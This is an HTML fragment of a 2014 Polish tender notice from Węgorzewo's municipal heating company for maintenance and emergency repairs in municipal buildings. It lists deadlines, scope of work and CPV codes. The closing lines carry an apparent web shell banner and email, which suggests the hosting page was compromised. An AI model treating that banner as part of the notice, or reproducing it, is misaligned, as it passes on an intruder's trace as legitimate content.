<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ciepłownie Miejskie Sp. z o.o., ul.B. Chrobrego 4, 11-600 Węgorzewo, w godzinach pracy tj. poniedziałek - piątek 7:00 - 15:00, a także złożyć wniosek o jej przesłanie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2014 godzina 11:00, miejsce: oferty należy składać na adres : Ciepłownie 
            Miejskie Sp. z o.o. ul. B. Chrobrego 4, 11- 600 Węgorzewo /sekretariat/..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Bieżąca konserwacja oraz usuwanie awarii w budynkach i lokalach komunalnych Gminy Węgorzewo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SZCZEGÓŁOWY ZAKRES ZAMÓWIENIA 
Część I - branża budowlana 
Zakres usług wykonywanych w branży budowlanej:
1) pełnienie pogotowia technicznego oraz niezwłoczne usuwanie awarii (i ich skutków) stwarzających zagrożenie dla życia, zdrowia lub mienia:
-usuwanie awarii w zakresie robót budowlanych w szczególnych sytuacjach awaryjnych oraz w sytuacjach zagrożenia życia lub mienia (np. włamania, pożar, kradzież, dewastacja),
-w sytuacji wystąpienia awarii niemożliwej do usunięcia poprzez naprawę - wymiana,
- przebudowa pieców kaflowych,
- usuwanie z połaci dachowej śniegu i lodu,
- inne czynności wykonywane na Zlecenie Zamawiającego, polegające na konserwacji lub usuwaniu awarii w zakresie robót budowlanych.
2) wykonywanie bieżącej konserwacji, w tym m.in.:
- naprawa miejscowo uszkodzonych tynków, uzupełnianie powłok malarskich na ścianach i sufitach,
- naprawa ubytków w ścianach, stropach, podłogach i posadzkach,
- uzupełnianie i naprawa izolacji cieplnych i zabezpieczeń przeciwwilgociowych,
- naprawa stolarki okiennej i drzwiowej, w tym: szklenie, wymiana okuć i elementów konstrukcyjnych stolarki, naprawa zawiasów, samozamykaczy, zamków i klamek,
- zabezpieczenie budynków na okres zimowy,
- uszczelnianie pokrycia dachu, drobne naprawy obróbek blacharskich, opierzeń, naprawa czyszczenie rynien, rur spustowych, kolan, rewizji,
- uzupełnienia i przemurowania kominów, gzymsów i murów ogniowych,
- naprawa i wymiana rur wywiewnych i kanalizacyjnych na dachu,
- usuwanie śniegu i lodu z dachów zagrażających bezpieczeństwu w okresie zimowym.
W przypadku gdy szacunkowy koszt usunięcia awarii przekroczy wartość 500,00 zł przed przystąpieniem do jej usunięcia należy powiadomić Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.50.00-9, 50.00.00.00-5, 50.70.00.00-2, 50.80.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com